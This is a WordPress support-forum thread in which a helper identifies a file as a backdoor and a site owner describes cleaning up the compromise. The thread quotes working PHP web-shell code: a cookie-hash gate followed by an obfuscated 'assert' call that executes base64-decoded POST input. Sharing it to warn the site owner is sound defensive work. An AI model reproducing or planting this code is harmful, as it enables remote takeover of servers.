Hi @ign2009,
You should immediately remove that file and run further scans on your website.
Looking at the code, it is a backdoor that allows attackers to execute code on your server remotely.
//only allows the attacker who uses a special token for the ssid cookie
if ((md5(@$_COOKIE[ssid])=="beef1e01ad41668d609d778ad3ba496b")) {
error_reporting(0);
//remotely executes code from $_POST
@array_map("as"."sert", (array) base64_decode($_POST[x]));
}
//probably an easy way for the attacker to see if your website has the backdoor installed or not
if ((@$_COOKIE[wprid]=="59857777ad9b3")) {
die(md5('ok'));
}
Dave
Thread Starter
Jan444
(@ign2009)
Hi Dave, many thanks. I was all day dealing with this. I performed scans with WordFence, removed offending files (some were newly created with strange characters, others were modified with eval injections), and cleaned old themes and plugins.
Re-installed WordPress, removed old installs, updated all plugins and themes everywhere, updated WordPress everywhere, removed lots of un-used themes.
Now the scans are showing all is fine.
I’ll wait and see but I’d say the situation is under control as no other “suspicious file modification” warning has popped up for the last hours, which was the way I noticed the problem.
Thanks for your great plugin!
Cheers,
Jan
That’s great! You’ve definitely taken all the necessary precautions to secure your site.
Please let us know if there’s any new suspicious activity on your site here.
Thanks!